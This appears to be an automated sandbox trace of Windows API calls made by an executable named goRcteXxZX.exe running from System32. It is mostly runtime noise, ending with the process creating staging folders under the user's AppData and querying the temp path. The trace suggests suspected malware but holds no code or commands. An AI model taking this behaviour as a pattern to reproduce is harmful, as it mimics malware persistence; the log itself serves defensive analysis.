dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.554] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1eeae8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0033.554] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x1ef19c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x17^\x9côÔô\x1e", lpUsedDefaultChar=0x0) returned 256 [0033.554] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.554] GetLastError () returned 0x0 [0033.554] SetLastError (dwErrCode=0x0) [0033.554] GetLastError () returned 0x0 [0033.554] SetLastError (dwErrCode=0x0) [0033.554] GetLastError () returned 0x0 [0033.554] SetLastError (dwErrCode=0x0) [0033.554] GetLastError () returned 0x0 [0033.554] SetLastError (dwErrCode=0x0) [0033.554] GetLastError () returned 0x0 [0033.554] SetLastError (dwErrCode=0x0) [0033.554] GetLastError () returned 0x0 [0033.554] SetLastError (dwErrCode=0x0) [0033.554] GetLastError () returned 0x0 [0033.554] SetLastError (dwErrCode=0x0) [0033.554] GetLastError () returned 0x0 [0033.554] SetLastError (dwErrCode=0x0) [0033.554] GetLastError () returned 0x0 [0033.554] SetLastError (dwErrCode=0x0) [0033.554] GetLastError () returned 0x0 [0033.561] SetLastError (dwErrCode=0x0) [0033.561] GetLastError () returned 0x0 [0033.561] SetLastError (dwErrCode=0x0) [0033.561] GetLastError () returned 0x0 [0033.561] SetLastError (dwErrCode=0x0) [0033.561] GetLastError () returned 0x0 [0033.561] SetLastError (dwErrCode=0x0) [0033.561] GetLastError () returned 0x0 [0033.561] SetLastError (dwErrCode=0x0) [0033.561] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.562] SetLastError (dwErrCode=0x0) [0033.562] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.563] SetLastError (dwErrCode=0x0) [0033.563] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.564] SetLastError (dwErrCode=0x0) [0033.564] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.565] SetLastError (dwErrCode=0x0) [0033.565] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.566] GetLastError () returned 0x0 [0033.566] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.567] GetLastError () returned 0x0 [0033.567] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.568] GetLastError () returned 0x0 [0033.568] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.569] SetLastError (dwErrCode=0x0) [0033.569] GetLastError () returned 0x0 [0033.570] SetLastError (dwErrCode=0x0) [0033.570] GetLastError () returned 0x0 [0033.570] SetLastError (dwErrCode=0x0) [0033.570] GetLastError () returned 0x0 [0033.570] SetLastError (dwErrCode=0x0) [0033.570] GetLastError () returned 0x0 [0033.570] SetLastError (dwErrCode=0x0) [0033.570] GetLastError () returned 0x0 [0033.570] SetLastError (dwErrCode=0x0) [0033.570] GetLastError () returned 0x0 [0033.570] SetLastError (dwErrCode=0x0) [0033.570] GetLastError () returned 0x0 [0033.570] SetLastError (dwErrCode=0x0) [0033.570] GetLastError () returned 0x0 [0033.570] SetLastError (dwErrCode=0x0) [0033.570] GetLastError () returned 0x0 [0033.570] SetLastError (dwErrCode=0x0) [0033.570] GetLastError () returned 0x0 [0033.570] SetLastError (dwErrCode=0x0) [0033.570] GetLastError () returned 0x0 [0033.570] SetLastError (dwErrCode=0x0) [0033.570] GetLastError () returned 0x0 [0033.570] SetLastError (dwErrCode=0x0) [0033.570] GetLastError () returned 0x0 [0033.570] SetLastError (dwErrCode=0x0) [0033.570] GetLastError () returned 0x0 [0033.570] SetLastError (dwErrCode=0x0) [0033.570] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.571] SetLastError (dwErrCode=0x0) [0033.571] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.572] SetLastError (dwErrCode=0x0) [0033.572] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.573] SetLastError (dwErrCode=0x0) [0033.573] GetLastError () returned 0x0 [0033.574] SetLastError (dwErrCode=0x0) [0033.574] GetLastError () returned 0x0 [0033.574] SetLastError (dwErrCode=0x0) [0033.574] GetLastError () returned 0x0 [0033.574] SetLastError (dwErrCode=0x0) [0033.574] GetLastError () returned 0x0 [0033.574] SetLastError (dwErrCode=0x0) [0033.574] GetLastError () returned 0x0 [0033.574] SetLastError (dwErrCode=0x0) [0033.574] GetLastError () returned 0x0 [0033.574] SetLastError (dwErrCode=0x0) [0033.574] GetLastError () returned 0x0 [0033.574] SetLastError (dwErrCode=0x0) [0033.574] GetLastError () returned 0x0 [0033.574] SetLastError (dwErrCode=0x0) [0033.574] GetLastError () returned 0x0 [0033.574] SetLastError (dwErrCode=0x0) [0033.574] GetLastError () returned 0x0 [0033.574] SetLastError (dwErrCode=0x0) [0033.574] GetLastError () returned 0x0 [0033.574] SetLastError (dwErrCode=0x0) [0033.574] GetLastError () returned 0x0 [0033.574] SetLastError (dwErrCode=0x0) [0033.574] GetLastError () returned 0x0 [0033.574] SetLastError (dwErrCode=0x0) [0033.575] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0033.575] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0033.575] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0033.576] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef518 | out: lpSystemTimeAsFileTime=0x1ef518*(dwLowDateTime=0xe1b31770, dwHighDateTime=0x1d3dfba)) [0033.576] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ef450, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.576] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ef338, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.576] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetLastError () returned 0x0 [0033.577] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.577] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0033.577] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.577] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.577] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.577] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.577] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0033.577] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0033.578] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0033.578] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0033.578] GetLastError () returned 0xb7 [0033.578] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.578] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0033.578] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0033.578] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0033.578] 